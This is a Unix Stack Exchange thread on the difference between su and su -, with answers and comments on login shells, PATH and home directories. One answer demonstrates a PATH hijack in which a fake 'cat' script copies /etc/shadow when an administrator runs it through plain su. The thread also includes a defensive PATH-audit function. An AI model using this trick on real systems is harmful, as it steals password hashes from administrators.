I don't understand why su - is preferred over su to login as root.
4 Answers
su - invokes a login shell after switching the user. A login shell resets most environment variables, providing a clean base.
su just switches the user, providing a normal shell with an environment nearly the same as with the old user.
Imagine, you're a software developer with normal user access to a machine and your ignorant admin just won't give you root access. Let's (hopefully) trick him.
$ mkdir /tmp/evil_bin
$ vi /tmp/evil_bin/cat
#!/bin/bash
test $UID != 0 && { echo "/bin/cat: Permission denied!"; exit 1; }
/bin/cat /etc/shadow &>/tmp/shadow_copy
/bin/cat "$@"
exit 0
$ chmod +x /tmp/evil_bin/cat
$ PATH="/tmp/evil_bin:$PATH"
Now, you ask your admin why you can't cat the dummy file in your home folder, it just won't work!
$ ls -l /home/you/dummy_file
-rw-r--r-- 1 you wheel 41 2011-02-07 13:00 dummy_file
$ cat /home/you/dummy_file
/bin/cat: Permission denied!
If your admin isn't that smart or just a bit lazy, he might come to your desk and try with his super-user powers:
$ su
Password: ...
# cat /home/you/dummy_file
Some important dummy stuff in that file.
# exit
Wow! Thanks, super admin!
$ ls -l /tmp/shadow_copy
-rw-r--r-- 1 root root 1093 2011-02-07 13:02 /tmp/shadow_copy
He, he.
You may have noticed that the corrupted $PATH variable was not reset. This wouldn't have happened if the admin had invoked su - instead.
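A defensive check for the situation in the answer above, as an added example that is not part of the original answer: it inspects a PATH value for entries a non-root user controls, which is what an administrator would want to know before typing plain su in someone else's session. The function name audit_path and its output labels are assumptions made for this example.

```shell
#!/bin/sh
# Added example: audit a PATH value before running plain `su` (no dash).
# audit_path is a hypothetical helper name, not a standard tool.

# Print one "reason: entry" line for every PATH entry that lets a non-root
# user decide which binary root ends up running.
# Returns 1 if anything was flagged, 0 if the PATH looks clean.
audit_path() {
    # The appended ":" keeps a trailing empty entry ("a:" means "a" plus cwd).
    path_value="$1:"
    flagged=0
    old_ifs=$IFS
    set -f                          # no globbing while splitting
    IFS=:
    set -- $path_value
    IFS=$old_ifs
    set +f
    for dir in "$@"; do
        case $dir in
            '') echo "empty-entry-means-cwd: (empty)"; flagged=1; continue ;;
            /*) ;;                  # absolute entry: inspect it below
            *)  echo "relative: $dir"; flagged=1; continue ;;
        esac
        [ -d "$dir" ] || continue   # skip entries that do not exist
        # Anyone who owns the directory can drop a fake `cat` into it.
        if [ -n "$(find "$dir" -prune ! -user root 2>/dev/null)" ]; then
            echo "not-root-owned: $dir"; flagged=1
        fi
        # So can anyone at all if the directory is world-writable.
        if [ -n "$(find "$dir" -prune -perm -0002 2>/dev/null)" ]; then
            echo "world-writable: $dir"; flagged=1
        fi
    done
    return "$flagged"
}
```

Calling audit_path "$PATH" in the session before switching user reports a directory created by an ordinary user, such as the answer's /tmp/evil_bin, as not-root-owned.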
su - logs you in completely as root, whereas su makes it so you are pretending to be root.
The most obvious example of this is that ~ is root's home directory if you use su -, but your own home directory if you use su.
Depending on your system, it may also mean differences in prompt, PATH, or history file.
So if you are part of a team administering a system, and your colleague gives you a command to run, you know it will work the same if you are both using su -, but if you are both using su, there may be differences due to you having different shell configurations.
On the other hand, if you want to run a command as root but using your own configuration, then maybe su is better for you.
Also don't forget about sudo, which has a -s option to start a shell running as root. Of course, this has different rules as well, and they change depending on which distribution you are using.
- When I "su" I get ~ and $HOME both evaluating to /root. Is the behavior you describe specific to certain shells or OS versions or something? It's my understanding that ~ can be expanded by the kernel. I've got zsh as my (and root's) shell. – JasonWoof Feb 08 '11 at 00:05
- Your .bashrc or /etc/bashrc or /etc/profile.d scripts are setting PATH. Look for if [ $UID -eq 0 ] or something like that. – Mikel Feb 08 '11 at 01:14
- Your example does not work for me. I get the same directory resolved in either way. – Daniel W. Apr 18 '16 at 14:45
- @Mikel - Could you please point me to some resource on what the - does in general? Say it is appended to something else than su. For context, I am trying to understand what does this command do: xauth -f $XAUTH nmerge -. Thanks a lot. – Matteo Sep 13 '20 at 17:12
The main difference is:
su - username sets up the shell environment as if it were a clean login as the specified user; it accesses and uses the specified user's environment variables.
su username just starts a shell with the current environment settings for the specified user.
If username is not specified with su and su -, the root account is implied as default.
I use su -- when I'm in a directory as a regular user but want to switch to root and remain in the same directory after the switch. When you use su - it switches the user to root and also takes you to /root, which is the root home directory.
- … umask like 000 or it won't work. – Lekensteyn Oct 22 '11 at 08:48
- … su --, which behaves like su -, but does not change the current directory. – Simon Richter Feb 07 '11 at 12:25
- … su --. That's really useful and I'm going to start using it today. Thanks – Michael Feb 07 '11 at 13:55
- … su -- is the same as su. – Mikel Feb 07 '11 at 20:08
- … su file inside the PATH. It's not so hard to mimic the behavior of the real su. The super-user has been careless anyway :-) – Stéphane Gimenez Feb 28 '12 at 18:53
- … su -- is NOT the same as su -: -- tells a getopt(s) (or similar) option handler to stop processing the command line for further options (useful for example if the rest contains filenames which could start with a '-'). I.e., in "rm -i -- -f": -f is then treated as a regular argument, so here as the name of the file to rm -i, and not as an additional -f option to the rm command. So su -- is just su and not su -! So su -- would be as unsafe to the (funny and instructive) example given by wag. Use su -. – Olivier Dulac Dec 26 '12 at 15:05
- … ssh into a remote server? Because I can't really think of any... – Martin Tournoij Mar 09 '16 at 14:56
- … - does in general? Say it is appended to something else than su. For context, I am trying to understand what does this command do: xauth -f $XAUTH nmerge -. Thanks a lot. – Matteo Sep 13 '20 at 17:11
- … - could mean stdin, and for others it could mean something else (ex: su). Man pages are your friend ^^ – Olivier Dulac Sep 13 '20 at 17:48
- … - is for. How could I figure it out? I posted a question about my problem (https://unix.stackexchange.com/questions/609255/xauthority-for-gui-in-a-docker-container) if you are able to help! thanks! – Matteo Sep 13 '20 at 18:00